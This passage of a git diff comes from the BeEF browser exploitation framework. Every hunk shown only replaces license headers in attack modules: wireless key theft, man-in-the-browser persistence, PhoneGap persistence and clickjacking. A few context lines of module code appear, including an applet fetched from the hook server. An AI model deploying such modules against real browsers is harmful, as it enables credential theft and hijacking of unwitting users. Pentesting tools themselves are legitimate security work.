compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. -// +/* + * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net + * Browser Exploitation Framework (BeEF) - http://beefproject.com + * See the file 'doc/COPYING' for copying permission + */ + beef.execute(function() { var applet_archive = 'http://'+beef.net.host+ ':' + beef.net.port + '/wirelessZeroConfig.jar'; var applet_id = '<%= @applet_id %>'; diff --git a/modules/host/get_wireless_keys/config.yaml b/modules/host/get_wireless_keys/config.yaml index 6bf1f7159..834c47a50 100644 --- a/modules/host/get_wireless_keys/config.yaml +++ b/modules/host/get_wireless_keys/config.yaml @@ -1,18 +1,9 @@ # -# Copyright 2011 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # + beef: module: get_wireless_keys: diff --git a/modules/persistence/man_in_the_browser/command.js b/modules/persistence/man_in_the_browser/command.js index 148b64eb0..9e64a64e4 100644 --- a/modules/persistence/man_in_the_browser/command.js +++ b/modules/persistence/man_in_the_browser/command.js @@ -1,17 +1,8 @@ -// -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +/* + * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net + * Browser Exploitation Framework (BeEF) - http://beefproject.com + * See the file 'doc/COPYING' for copying permission + */ beef.execute(function() { try{ diff --git a/modules/phonegap/phonegap_check_connection/command.js b/modules/phonegap/phonegap_check_connection/command.js index 470ab3638..c5791aff7 100644 --- a/modules/phonegap/phonegap_check_connection/command.js +++ b/modules/phonegap/phonegap_check_connection/command.js @@ -1,17 +1,9 @@ -// -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +/* + * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net + * Browser Exploitation Framework (BeEF) - http://beefproject.com + * See the file 'doc/COPYING' for copying permission + */ + beef.execute(function() { var connection_type; diff --git a/modules/phonegap/phonegap_persist_resume/command.js b/modules/phonegap/phonegap_persist_resume/command.js index 39bb9ed7e..65df0464d 100644 --- a/modules/phonegap/phonegap_persist_resume/command.js +++ b/modules/phonegap/phonegap_persist_resume/command.js @@ -1,17 +1,8 @@ -// -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +/* + * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net + * Browser Exploitation Framework (BeEF) - http://beefproject.com + * See the file 'doc/COPYING' for copying permission + */ // // persist on over app's sleep/wake events diff --git a/modules/social_engineering/clickjacking/command.js b/modules/social_engineering/clickjacking/command.js index 14269606f..522102be3 100644 --- a/modules/social_engineering/clickjacking/command.js +++ b/modules/social_engineering/clickjacking/command.js @@ -1,16 +1,9 @@ -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. -// +/* + * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net + * Browser Exploitation Framework (BeEF) - http://beefproject.com + * See the file 'doc/COPYING' for copying permission + */ + beef.execute(function() { var elems = { outerFrame: "cjFrame", diff --git a/modules/social_engineering/clickjacking/config.yaml b/modules/social_engineering/clickjacking/config.yaml index 8243cf0dc..c319b36c8 100644 --- a/modules/social_engineering/clickjacking/config.yaml +++ b/modules/social_engineering/clickjacking/config.yaml @@ -1,15 +1,7 @@ # -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: diff --git a/modules/social_engineering/clickjacking/module.rb b/modules/social_engineering/clickjacking/module.rb index 653329eb0..575e97d69 100644 --- a/modules/social_engineering/clickjacking/module.rb +++ b/modules/social_engineering/clickjacking/module.rb @@ -1,17 +1,9 @@ # +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -# + class Clickjacking < BeEF::Core::Command def self.options